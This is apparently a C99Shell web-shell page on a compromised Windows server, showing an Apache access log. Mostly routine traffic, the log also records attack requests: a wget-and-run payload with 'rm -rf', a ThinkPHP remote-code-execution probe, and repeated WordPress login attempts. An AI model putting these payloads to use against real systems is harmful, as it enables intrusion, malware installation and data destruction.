!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

E:\nuevo\apache\logs\   drwxrwxrwx
Free 9.41 GB of 239.26 GB (3.93%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     access.2022.08.30.log (3.45 MB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
172.22.2.4 - - [29/Aug/2022:23:59:04 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
207.46.13.115 - - [30/Aug/2022:00:01:11 -0500] "GET /galeria/carrusel/Carrusel/jquery.thumbnailScroller.js HTTP/1.1" 200 8157
157.55.39.8 - - [30/Aug/2022:00:01:16 -0500] "GET /galeria/carrusel/Carrusel/jquery-ui-1.8.13.custom.min.js HTTP/1.1" 200 10800
207.46.13.36 - - [30/Aug/2022:00:01:20 -0500] "GET /galeria/carrusel/Carrusel/jquery.thumbnailScroller.css HTTP/1.1" 200 2066
207.46.13.36 - - [30/Aug/2022:00:01:20 -0500] "GET /galeria/nivo-slider/demo/banner.html HTTP/1.1" 200 5446
172.22.2.4 - - [29/Aug/2022:23:59:54 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58946
201.245.192.253 - - [30/Aug/2022:00:02:58 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42606
216.245.221.92 - - [30/Aug/2022:00:03:32 -0500] "HEAD / HTTP/1.1" 200 -
84.17.52.134 - - [30/Aug/2022:00:04:18 -0500] "GET /wp-content/uploads/ HTTP/1.1" 404 1032
189.126.95.29 - - [30/Aug/2022:00:05:09 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [30/Aug/2022:00:05:34 -0500] "GET /BLA/boletinlegal/sugerencias.php HTTP/1.1" 200 8615
172.22.2.4 - - [30/Aug/2022:00:05:35 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/AnalisisC-746-12.docx HTTP/1.1" 304 -
172.22.2.4 - - [30/Aug/2022:00:04:49 -0500] "GET /BLA/boletinlegal/index.php HTTP/1.1" 200 50790
172.22.2.4 - - [30/Aug/2022:00:04:54 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [30/Aug/2022:00:05:44 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 54347
201.245.192.253 - - [30/Aug/2022:00:07:56 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42606
216.245.221.92 - - [30/Aug/2022:00:08:32 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [30/Aug/2022:00:09:05 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 63198
186.102.3.115 - - [30/Aug/2022:00:11:56 -0500] "GET /kwssiamovil/sm/ldap/au?x=U2FsdGVkX1+bxurwERvKoD/ZfgmA6XxrU4d+OARb+3ujY4Os88ruh1QQn7unQqKKddBzBmfXjI6cltaqPCCCeQ==&y=U2FsdGVkX18aot5EnUhh8HqFq/IsGtyLoHVmh/vfmWE5sar78oDKwNlwuNit2vXx HTTP/1.1" 200 30
186.102.3.115 - - [30/Aug/2022:00:11:56 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX18UAy4NYIKv0KAahU4yLrr5yt63ssv0kKjd19US88WIZZluyHiEPWbzKpYHYYqpppsRRLIGS6CmXO7gmfJkX4evhuLqV7AmWqs=&u=U2FsdGVkX1+QmPq+SXNSlD5+etA3ypNFAcHRwkZGMXABYzih193xYmX6JVvJuAqe&y=U2FsdGVkX18aot5EnUhh8HqFq/IsGtyLoHVmh/vfmWE5sar78oDKwNlwuNit2vXx HTTP/1.1" 200 97
186.102.3.115 - - [30/Aug/2022:00:11:56 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX19mLjtteas5OtSsUTToH/gk++73IP1JtS0g9Ej8/yq5YFegDCahUEZSb7hShUqboEKRX7hIbw5rdZymRY+cPF6bkiKhUFoHQtWiu5TrNC4hvdCc0JXMR3DeHOKujA1e65TxYepG5WoxinaR93wlYVNb76dCpDP5Ycma0IfrYZj865v5jEenTyuBnHQlf2HL1WMMwzzBlvze7gHWE+zvBxFyd2smM6yEQa7+zTmNpHl68d+04GdFtETJtxWnAZ4oDUIRYitg4UEsKZEimiiBtRjqjns9wdwcDMTrTovxmdd/wwr00xqWcJCohlZD7daj5sqeGgPcaHNE8iGIcSBS0X0DPaqsZ24lLl/9AmjzO3au/QWNVyzceDktvxm87Vdb3XoNhyCgwcEVmqd2to4qvXDJNQ4l+PU/TheK+aFQaSN6JRmatcyytqvepPHaT0t5rkCfeFfkxZPKwOk5Hqz1K3b5hbBswwYh+mKup2tPLM2QF5s8NqFPaeU2BKv0GX3Ha8LDtrGDdLj0SLCWlDcIY7u1vr1VddVMGUlu45bg0kqI7yWPLDdOBzztxcqpg6rUZx9umGSh9fiw7CO1Qg1k9JgEuQ8TsJSqxf7KUAnem04hhmugK5uHhC0B8cuMlCvxeEcg0B/FBm1ykl1ctHns4ePZBKeL2XaH2bEJBPoQ+5lQsssuljxuN/YeR8Llc4A81jlaBnsxxAMXh0R52iaDG/l+pyZdJqjkaAHjTEMrhDBKt0CGxCcJRqmoVA3UYufxGQJbGMqM3nuWrs47akFXPy/zKBgvaPDqvJQkIVcF3Bi9aXMPkTTL5PHmPlLch0/o2K3lqP+G6RAHPFEIoXJMYlvLxF0DISiC2QRyXA406ffhwsI6faxNx7qXhS9oOam8n0qCP8PEb8AMaooGGwiw++qZLXd/CGqVGnCgeMVzyvnapho6E8bsgH5RU7mE1NGJU+wt8Ou93h1g7HgmJTqt3qauBeCofvDZxMFZ2+gPH8t6PReB1i9tFMHCgnk/Ony2RYD0+M5MkxI6rFKcNhTgAalAVm5MNZnSztfgIYn3De68HwJHLMeY95J+YU1qbkr0wUTtAC14u6+6QaU4NNTBJT8mhE6GkrpQ9K4jjDLjHRfTpVCHa6uuiq7Ax+NlOySY3/cma/teTBEm9pb4KRvp6lrV1Nt44c8Woml6tEV5FOnXVNY+K/kPJcKbecFB/pVZRWO1qbIuFG2CpdrDiof5MbAFudf2tYWZp08n0EWcR9cmZzHLQBtc00t5swrbqn3Tqc8PL15Qbg82PknYxOjg5prPRtnd4KU9k1QA/1ZRJxVyHI32VwKigQjPcI7J4P5V2eQVuSaHEmR0DxKeMj/Ut8sydgwj7REmxU0=&u=U2FsdGVkX1+QmPq+SXNSlD5+etA3ypNFAcHRwkZGMXABYzih193xYmX6JVvJuAqe&y=U2FsdGVkX18aot5EnUhh8HqFq/IsGtyLoHVmh/vfmWE5sar78oDKwNlwuNit2vXx HTTP/1.1" 200 5935
186.102.3.115 - - [30/Aug/2022:00:11:56 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1+ne8LI4/JtmfahWR2D3gQNXXjn6mqvj2mg8YUeGM7wwL/YjqeSKGiwOcdwJaIC5L0VuOam1VFGCRqSll6Rl0H3Ca3n3TXmsSoMAeJB56gClHL3sBkFqU4JTCxQmYVp5J8HFNC6+CqlwKr5bxSd/b8io2nqEcWexI4dQnRCsKjxK3MgkXWkfYTCfHL3mhyCVByZ0UzMS6+4s0tNIYqOAWU6y2D45F9rkQQFbhuKysZvAQ7xbqHdbr8qZ4l+JIQBtb8KMVOhVyKLP15ngtv89ThqrrzR/7t05RI=&u=U2FsdGVkX1+QmPq+SXNSlD5+etA3ypNFAcHRwkZGMXABYzih193xYmX6JVvJuAqe&y=U2FsdGVkX18aot5EnUhh8HqFq/IsGtyLoHVmh/vfmWE5sar78oDKwNlwuNit2vXx HTTP/1.1" 200 176
186.102.3.115 - - [30/Aug/2022:00:11:56 -0500] "GET /kwssiamovil/sm/cjson/pre?f=1&x=U2FsdGVkX1+bxurwERvKoD/ZfgmA6XxrU4d+OARb+3ujY4Os88ruh1QQn7unQqKKddBzBmfXjI6cltaqPCCCeQ== HTTP/1.1" 200 30992
172.22.2.4 - - [30/Aug/2022:00:11:59 -0500] "GET /BLA/boletinlegal/actos.php/niceforms.js HTTP/1.1" 200 9559
66.249.79.113 - - [30/Aug/2022:00:12:14 -0500] "-" 408 -
172.22.2.4 - - [30/Aug/2022:00:10:44 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [30/Aug/2022:00:12:55 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42606
172.22.2.4 - - [30/Aug/2022:00:11:34 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58154
216.245.221.92 - - [30/Aug/2022:00:13:32 -0500] "HEAD / HTTP/1.1" 200 -
152.61.192.232 - - [30/Aug/2022:00:13:56 -0500] "GET / HTTP/1.1" 200 319
186.31.51.120 - - [30/Aug/2022:00:14:35 -0500] "OPTIONS /kwssiamovil/sm/setfile/f? HTTP/1.1" 200 13
186.31.51.120 - - [30/Aug/2022:00:14:35 -0500] "POST /kwssiamovil/sm/setfile/f? HTTP/1.1" 200 381
186.31.51.120 - - [30/Aug/2022:00:15:00 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1+2DBrC+gExsyuSLNv40milwl0kYSaBKUiYRLkdnWD/Ll5K2U3A5iKUOKwuwtkoe0tJgocTKOBq6HjDHzeidvRUDqEVfxBcO+U6RCHsgwI8Y9QP35hsVD1xn709bNwy/9t3ysrUzTU/ZL5H1Xpm7vtc4ECpOoGG78ZCdvoXJXTt1ibtSztwVOSCD1vDdWs3hoDhJRMQQoRjDfCQhiz84qU0JZ2SN+dhfuv2Cvao2ywtvvEa/N8QE1yPR7LMQjwEd9iVc9kaOqRgNw==&u=U2FsdGVkX181ik7NcOmyAKteT0FWhMMSAQiYtZ0rS0Z0uYsnao2NsscL8lB9mKDr&y=U2FsdGVkX19g48ydpdBgutrXFPASolE5pJamblmKNEI43dWkuZhfuifwWbF3/vRp HTTP/1.1" 200 25
186.31.51.120 - - [30/Aug/2022:00:15:01 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1/sLf1/1/R6g7RtpOKibnFOmaQlixdEsL714KzsN5ZyOUveXAli9gwCul0UoLAhgb3w7uB94jgfF5pVWvGhJOEZvLBAn83jQtwwaO0m+bZDC9Hu3v2dAQVIf2FQ5zUNjjU32eXYIyoqcCBy2Vq9RhcAmjH9pVlKegpfXk8Aj15qf8B02m12ercSQu91PxuQ7y7kYnemSD1JwHH5nMauRbjrgr0rJa5cYxTd5hDHKLVIydDURAI69p/VsiahtAezbDSzPv6ujL+yXdtZFad+dTCcytIS24YkrCNa5tFp6jpi3xASoMQA4p7hpP05Ap2cDiXgbMkDPVH20somS1JafaNepcNv96bR7CJn41bR+g0I9MuQYRUHPXmsAFdMY46RVjCvIfjhSQURFNZak0s4KbIjuvMcedkLCFAvHom7yaHeaaZum+hJmccLR1f2VtVANflvgH87/vNHchcA/bHV5UV5lmX8irbYi74O//RteUmxsf0u32ePE8uKbRj9QKZIgOjtzwHE+CmXiYqE9+549c4kUOyNzPnol+XFg5bTeUT4ShNzOTJIKXYim25hqiHG9Fz5wHxnGEszlzryBNh7bBcraHgAKNUE7JO/RaFNX7LDFEgaXxDUceFUj3l9HE0XcAcSyRQ24AP4qGsqmzx8f8iYEXVibqfWq2lnk3+2B7sQKLjmJ+3o7mmmqFS/ksNlwzKuXxS/p4kG0/T1yfNgHuNQM8KUsnYE1z56f5nidzfhBXOVOGvWnGDoaduxf60binOYAEhoJOC3IwyViSR9mZEztE3W3T50xSewYORw5rmDVzgYeiFSF0QM5/jXPvx3wl8AGgFi219x0udwnbjWMVJyLsOT/Wt4GFsDu6qOj+L8xKOg39bje77zH80vO5Pff6SwUTrvRYTSV6efJ2JTsl5kI4/Y0SQPczS1T1EViZt2IfMl7jz9z3NVCBNqJPq8qmmE2bG6y8Y5VkWVV1JssAVJinhDMjar7N9yR41aulHEvWPHGC2BUHyhWNQGU+m3Ru4yS1NqaGiYAwvx9g6jWOmzp5nqyi5MQPpyEmxZCV6WSYvT/PPvQWEZQPMnuygfTmiZasP3XNi5aL4LDcbyfQbbFm7WtEEmxPNeavTvZrHEtjSMdpWmNrukr4cVXsb8KCGLgtcDroPV9IQrwCPnaFuHQ4lNd9eO7bsBJmZJXBZKMpkrUptC6UfrPKR6ftflwQQ3O2+5qBjGJqZ8CTqIm5rb4RZcW6mXxMGjWGlFrNYef8DTQeRDUtnBi/kafXh0xU7e5PZ1VSVnWjtKuomA3Mkkd3J7uHH3+NmNikMepLzlPadoXsoVu3KhXvLS2pZXWG4goi3nTHrueoyD40OzCi6eZjcNpNlYcNgd7U3ZIKzhJhYOFdLWofCVjos0qLOzYwne7OWam3KJrt+LaLcAMJ77GpmyDPK4uF8FH/uWnXeN+HAjCFvdtnnTOD2zn/zYaxrdIlqwagCvkBSGSFJObdTAPKscSxQX/MBcNCKjm6AS73M+CNoqQhr+MsB0Fm0c+08QrsM1DWuBwIYMB1rhhVy1YLPEZUVG+SCeSRPS/dLiRED8WwGRow+TxqvLuVEkfyihUeREbusOmZAuBPZdl6Z5kOFIVYD8TiZr6/eB3OhGz7OM+OL+VltEUWxRg/YujI0qYUdOeNkGmy4v1nCgh8F3V/pcIfPSr+H6cFme71hnazPO6FbEIxZin1fhBdKTddh72fjcQ8KY67C2OwGuzZMb+S5uLQVL5NPiXlQ77TEEh0X3078ra6w8b+kl1FXd1l1xnownKzXeOA==&u=U2FsdGVkX181ik7NcOmyAKteT0FWhMMSAQiYtZ0rS0Z0uYsnao2NsscL8lB9mKDr&y=U2FsdGVkX19g48ydpdBgutrXFPASolE5pJamblmKNEI43dWkuZhfuifwWbF3/vRp HTTP/1.1" 200 25
186.31.51.120 - - [30/Aug/2022:00:15:01 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1/HJhYPIWdyu7Y2OY12b2K3xLuQJdSA9Q0JQXdUp6Usvn95yccPEeugW0HlcnFMZDzp1WEuabmYDCeXHqzPfHSgbrCc7K1iWel6v0ALb2rlz837AR8vGSfZP+JBIzMIQyWR03ZsF/SkU1QTsldAhnc26OiFwyXXU9k=&u=U2FsdGVkX181ik7NcOmyAKteT0FWhMMSAQiYtZ0rS0Z0uYsnao2NsscL8lB9mKDr&y=U2FsdGVkX19g48ydpdBgutrXFPASolE5pJamblmKNEI43dWkuZhfuifwWbF3/vRp HTTP/1.1" 200 25
186.31.51.120 - - [30/Aug/2022:00:15:01 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX18R/oS3rrFtPK86hBP8QFVguHVU84trWTonXOBRWLm6F2uHt9ds7N3UIlmXEQZTIiBA0SRTE9Kradb9W2NWjAEgT3GwPNvC02PXQ5nTK6ejYkJPNLLMiBxDYSJdJpTrsSWr/yb1LvzAOUjqq+ZDI3ELKHMPurNLSCQ=&u=U2FsdGVkX181ik7NcOmyAKteT0FWhMMSAQiYtZ0rS0Z0uYsnao2NsscL8lB9mKDr&y=U2FsdGVkX19g48ydpdBgutrXFPASolE5pJamblmKNEI43dWkuZhfuifwWbF3/vRp HTTP/1.1" 200 25
186.31.51.120 - - [30/Aug/2022:00:15:01 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX19sGJVRLNL0rQmiHKFTwjDsEq6g2Lo7apUaXwipEhoYXktr9wyaq4VFc25KwMNPeRhs44TQOQg/Wrxtc3ly/JB/XtTWXeEgkEWOBoaokSqwdaLyl7rJBXpLPYgNs6b52soXPexRfn//18KTzGcdkgTGg2Lmzo+GUro=&u=U2FsdGVkX181ik7NcOmyAKteT0FWhMMSAQiYtZ0rS0Z0uYsnao2NsscL8lB9mKDr&y=U2FsdGVkX19g48ydpdBgutrXFPASolE5pJamblmKNEI43dWkuZhfuifwWbF3/vRp HTTP/1.1" 200 25
186.31.51.120 - - [30/Aug/2022:00:15:01 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1/nxPPjqX5Lqq7jJONpflIUy8YN+YR8ZdYV3vchTUNzo+PnX8vpp4h7/h9FNGyWqkx0CagpGnmHxPFMBYF0+8AGo13l1XMsZSD3RtK9FDDVKEpPeQjKRQwNKTKeFY3yCog78AalP/0UpjPzAVbtUagulS1lrsJIdrn5sHfniqV/PVPsZfOHL9rE&u=U2FsdGVkX181ik7NcOmyAKteT0FWhMMSAQiYtZ0rS0Z0uYsnao2NsscL8lB9mKDr&y=U2FsdGVkX19g48ydpdBgutrXFPASolE5pJamblmKNEI43dWkuZhfuifwWbF3/vRp HTTP/1.1" 200 25
186.31.51.120 - - [30/Aug/2022:00:15:02 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX19ZO98hirPNqH5gbaDK1dcYIv9zBDUftNJADx1NJuWpS5kviBtA5rILmSudP7KWSq0waWiyTE3dxwMMUVome2ej94zR41HLO5WU4KFHPlcqR3DiFMxDfnOQ0qZOP82CeqcGtqsp+PafYvmG1mO/gZ8pYPLWIaZxHWzGbrOgARqT/1mWG7P0JCTQiCZqyyQJpC1NfAXkilcV2bjIyXldqM5irfoWffskevx+uWjdJCchriuL64mxCZQgyMxum4rHo/ir4fBArDidv1Ph8oIhghVCUbaKqg6KyPb8Ga9Gk+TIVAMvHEAFcEW6/D8YCvrOnvwb43P1r/dr3R1VWQ++esw9amFartsGnvSxneN82pe50s+zSaOgT9jID9h4cb7b6MfCiTTZdfsJizJldGo795ZCSbfRf3b+EgA+bdtMECDe1xI3MH8nTKDxjGNO0EWxC3q9/C7vi4w4KA==&u=U2FsdGVkX181ik7NcOmyAKteT0FWhMMSAQiYtZ0rS0Z0uYsnao2NsscL8lB9mKDr&y=U2FsdGVkX19g48ydpdBgutrXFPASolE5pJamblmKNEI43dWkuZhfuifwWbF3/vRp HTTP/1.1" 200 25
186.31.51.120 - - [30/Aug/2022:00:15:02 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX19SvJcoWIqMIBs+QSA7as9rRat7ad+LDqGaawUWBIOpUAGb0DkP8/jwGwr+164vkFJBdfSBlC0tHIJBDYiaokuRKwVsJ6hlXOm5TR0R6kyvXjD/gY/sgSiw9XNanFtiO1/fyC9d/Qbz3XxDkF+BQEAJegbA8z0zkoIA5bkuO/ywBl+1/pEiw6aLR6lmi3/zElrAnQo70ToSrClkmOUtrcMHg+AjC55KvVgI+M2SbTNDoQDnPzNwlWSjDzMbY40SWN3dYqnh/gwcfzalkH0masNn7dvW39v2+C1OE0cZ0DaFS/6LEa3dvoxLKTzoUxFhru++970BULYKYrs+b5nAdlPBJin5yCdpj+1LR0ExaQHxpIeoDVP13XPixizdwrXQClVdKBY9I70lLBkup1jdj/ahPRN4PzZJKPE=&u=U2FsdGVkX181ik7NcOmyAKteT0FWhMMSAQiYtZ0rS0Z0uYsnao2NsscL8lB9mKDr&y=U2FsdGVkX19g48ydpdBgutrXFPASolE5pJamblmKNEI43dWkuZhfuifwWbF3/vRp HTTP/1.1" 200 25
172.22.2.4 - - [30/Aug/2022:00:15:34 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/Analisis%20Jurisprudencia%20Sent%202000-00005-01.doc HTTP/1.1" 304 -
172.22.2.4 - - [30/Aug/2022:00:15:34 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/AnalisisT-606-15.docx HTTP/1.1" 304 -
40.77.189.67 - - [30/Aug/2022:00:17:10 -0500] "GET /galeria/nivo-slider/themes/default/default.css HTTP/1.1" 200 1569
40.77.189.84 - - [30/Aug/2022:00:17:10 -0500] "GET /galeria/nivo-slider/themes/pascal/pascal.css HTTP/1.1" 200 2258
40.77.189.69 - - [30/Aug/2022:00:17:10 -0500] "GET /galeria/nivo-slider/themes/orman/orman.css HTTP/1.1" 200 2152
40.77.189.222 - - [30/Aug/2022:00:17:10 -0500] "GET /galeria/nivo-slider/nivo-slider.css HTTP/1.1" 200 1507
40.77.189.69 - - [30/Aug/2022:00:17:11 -0500] "GET /galeria/nivo-slider/demo/style.css HTTP/1.1" 200 2222
40.77.189.77 - - [30/Aug/2022:00:17:11 -0500] "GET /galeria/nivo-slider/demo/scripts/jquery-1.7.1.min.js HTTP/1.1" 200 93868
40.77.190.171 - - [30/Aug/2022:00:17:11 -0500] "GET /galeria/nivo-slider/jquery.nivo.slider.pack.js HTTP/1.1" 200 11561
201.245.192.253 - - [30/Aug/2022:00:17:53 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42606
172.22.2.4 - - [30/Aug/2022:00:16:34 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [30/Aug/2022:00:18:32 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [30/Aug/2022:00:17:24 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60272
207.46.13.115 - - [30/Aug/2022:00:19:32 -0500] "GET /BLA/resoluciones/859.tif HTTP/1.1" 404 1018
152.61.128.50 - - [30/Aug/2022:00:19:43 -0500] "GET / HTTP/1.1" 200 319
201.245.192.253 - - [30/Aug/2022:00:20:12 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42742
201.245.192.253 - - [30/Aug/2022:00:20:18 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42280
157.55.39.22 - - [30/Aug/2022:00:20:35 -0500] "GET /inicio/vistas-360/ HTTP/1.1" 404 1049
157.55.39.8 - - [30/Aug/2022:00:21:39 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2022%2F HTTP/1.1" 200 220063
201.245.192.253 - - [30/Aug/2022:00:22:53 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42606
216.245.221.92 - - [30/Aug/2022:00:23:32 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [30/Aug/2022:00:22:24 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [30/Aug/2022:00:23:14 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60865
185.119.81.100 - - [30/Aug/2022:00:27:01 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.100 - - [30/Aug/2022:00:27:02 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
201.245.192.253 - - [30/Aug/2022:00:27:52 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42606
216.245.221.92 - - [30/Aug/2022:00:28:32 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [30/Aug/2022:00:28:14 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [30/Aug/2022:00:30:12 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42742
201.245.192.253 - - [30/Aug/2022:00:30:16 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42280
172.22.2.4 - - [30/Aug/2022:00:29:04 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60272
201.245.192.253 - - [30/Aug/2022:00:32:51 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42606
216.245.221.92 - - [30/Aug/2022:00:33:32 -0500] "HEAD / HTTP/1.1" 200 -
34.90.197.50 - - [30/Aug/2022:00:34:38 -0500] "GET / HTTP/1.1" 200 4720
34.90.197.50 - - [30/Aug/2022:00:34:38 -0500] "GET / HTTP/1.1" 200 319
66.249.79.115 - - [30/Aug/2022:00:34:44 -0500] "-" 408 -
40.77.167.99 - - [30/Aug/2022:00:35:32 -0500] "-" 408 -
172.22.2.4 - - [30/Aug/2022:00:34:04 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [30/Aug/2022:00:34:54 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57366
172.22.2.4 - - [30/Aug/2022:00:36:17 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 32715
201.245.192.253 - - [30/Aug/2022:00:37:51 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42606
2.57.122.98 - - [30/Aug/2022:00:38:27 -0500] "GET / HTTP/1.1" 200 319
216.245.221.92 - - [30/Aug/2022:00:38:32 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [30/Aug/2022:00:40:12 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42742
201.245.192.253 - - [30/Aug/2022:00:40:17 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42280
172.22.2.4 - - [30/Aug/2022:00:39:54 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [30/Aug/2022:00:40:44 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58154
201.245.192.253 - - [30/Aug/2022:00:42:50 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42606
216.245.221.92 - - [30/Aug/2022:00:43:32 -0500] "HEAD / HTTP/1.1" 200 -
185.119.81.100 - - [30/Aug/2022:00:43:40 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.100 - - [30/Aug/2022:00:43:41 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3650
178.73.215.171 - - [30/Aug/2022:00:45:47 -0500] "GET / HTTP/1.0" 200 319
185.119.81.103 - - [30/Aug/2022:00:46:46 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.103 - - [30/Aug/2022:00:46:47 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
172.22.2.4 - - [30/Aug/2022:00:45:44 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [30/Aug/2022:00:47:50 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42606
172.22.2.4 - - [30/Aug/2022:00:46:34 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53281
172.22.2.4 - - [30/Aug/2022:00:48:26 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1038
172.22.2.4 - - [30/Aug/2022:00:48:26 -0500] "GET /BLA/boletinlegal/Circulares/2018/CIRCULAR%20COJUNTA%20042%20DE%202018.pdf HTTP/1.1" 304 -
216.245.221.92 - - [30/Aug/2022:00:48:32 -0500] "HEAD / HTTP/1.1" 200 -
156.221.36.135 - - [30/Aug/2022:00:48:55 -0500] "GET /shell?cd+/tmp;rm+-rf+*;wget+synns.cf/jaws;sh+/tmp/jaws HTTP/1.1" 404 1013
172.22.2.4 - - [30/Aug/2022:00:50:34 -0500] "GET /BLA/boletinlegal/sugerencias.php HTTP/1.1" 200 8615
185.189.182.234 - - [30/Aug/2022:00:51:16 -0500] "GET / HTTP/1.1" 400 946
201.245.192.253 - - [30/Aug/2022:00:52:48 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42606
172.22.2.4 - - [30/Aug/2022:00:51:34 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.249.79.111 - - [30/Aug/2022:00:53:21 -0500] "-" 408 -
216.245.221.92 - - [30/Aug/2022:00:53:32 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [30/Aug/2022:00:52:24 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53281
157.55.39.51 - - [30/Aug/2022:00:54:32 -0500] "GET /acercar-programa-del-distrito-para-ayudar-a-las-empresas-a-crecer-de-manera-sostenible.html HTTP/1.1" 304 -
157.55.39.8 - - [30/Aug/2022:00:55:22 -0500] "GET /BLA/resoluciones/AUTOS%202022/0521.pdf HTTP/1.1" 200 2539151
172.22.2.4 - - [30/Aug/2022:00:56:05 -0500] "GET /BLA/boletinlegal/index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1" 200 36811
201.245.192.253 - - [30/Aug/2022:00:57:47 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42606
216.245.221.92 - - [30/Aug/2022:00:58:32 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [30/Aug/2022:00:58:58 -0500] "GET /BLA/boletinlegal/Circulares/2020/Circular%20No.%2000018%20del%2002%20de%20diciembre%20del%202020.pdf HTTP/1.1" 200 276868
172.22.2.4 - - [30/Aug/2022:00:57:24 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
152.61.192.232 - - [30/Aug/2022:00:59:33 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?request=GetCapabilities&service=WMS HTTP/1.1" 503 1020
152.61.192.232 - - [30/Aug/2022:00:59:34 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?SERVICE=WMS&REQUEST=GetCapabilities HTTP/1.1" 503 1020
152.61.192.232 - - [30/Aug/2022:00:59:34 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?WMTVER=1.0.0&REQUEST=capabilities HTTP/1.1" 503 1020
185.119.81.100 - - [30/Aug/2022:00:59:45 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.100 - - [30/Aug/2022:00:59:46 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
172.22.2.4 - - [30/Aug/2022:00:58:14 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56723
